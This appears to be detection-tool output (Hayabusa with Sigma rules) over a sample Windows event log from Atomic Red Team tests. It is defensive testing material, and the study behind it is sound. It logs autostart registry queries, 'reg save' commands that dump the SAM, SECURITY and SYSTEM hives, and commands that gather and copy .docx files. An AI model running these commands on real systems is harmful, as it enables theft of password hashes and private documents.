+2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D87C-5D31-0000-00103F573100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | LID: 0x50951 | PID: 4360 | PGUID: 747F3D96-D87C-5D31-0000-001080593100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 956 | PGUID: 747F3D96-D87C-5D31-0000-0010CA5B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D87C-5D31-0000-00101D5E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6832 | PGUID: 747F3D96-D87C-5D31-0000-001056603100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 6436 | PGUID: 747F3D96-D87C-5D31-0000-0010A8623100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5936 | PGUID: 747F3D96-D87C-5D31-0000-0010E1643100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D87C-5D31-0000-001033673100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1740 | PGUID: 747F3D96-D87C-5D31-0000-00107C693100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 644 | PGUID: 747F3D96-D87C-5D31-0000-0010C86B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4220 | PGUID: 747F3D96-D87C-5D31-0000-0010056E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | LID: 0x50951 | PID: 6620 | PGUID: 747F3D96-D87C-5D31-0000-001057703100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D87D-5D31-0000-001090723100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 3172 | PGUID: 747F3D96-D87D-5D31-0000-0010E2743100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2148 | PGUID: 747F3D96-D87D-5D31-0000-00102B773100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 1472 | PGUID: 747F3D96-D87D-5D31-0000-00107D793100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3616 | PGUID: 747F3D96-D87D-5D31-0000-0010B37B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D87D-5D31-0000-0010057E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D87D-5D31-0000-00103B803100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 1224 | PGUID: 747F3D96-D87D-5D31-0000-00108D823100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3900 | PGUID: 747F3D96-D87D-5D31-0000-0010CA843100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 3412 | PGUID: 747F3D96-D87D-5D31-0000-00101C873100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D87D-5D31-0000-0010FA8A3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-D87D-5D31-0000-00104C8D3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1728 | PGUID: 747F3D96-D87D-5D31-0000-0010958F3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\Security security.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D87D-5D31-0000-0010E4913100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3904 | PGUID: 747F3D96-D883-5D31-0000-0010839B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\System system.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-D883-5D31-0000-0010D49D3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D885-5D31-0000-00107F1A3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SAM sam.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | LID: 0x50951 | PID: 4140 | PGUID: 747F3D96-D885-5D31-0000-0010D11C3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D887-5D31-0000-0010D51F3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D88F-5D31-0000-0010BD353200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,../hayabusa-rules/sigma/process_creation/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-D890-5D31-0000-001012383200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,../hayabusa-rules/sigma/process_creation/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .docx | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 6328 | PGUID: 747F3D96-D890-5D31-0000-0010A5383200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1568 | PGUID: 747F3D96-D890-5D31-0000-0010FA3F3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
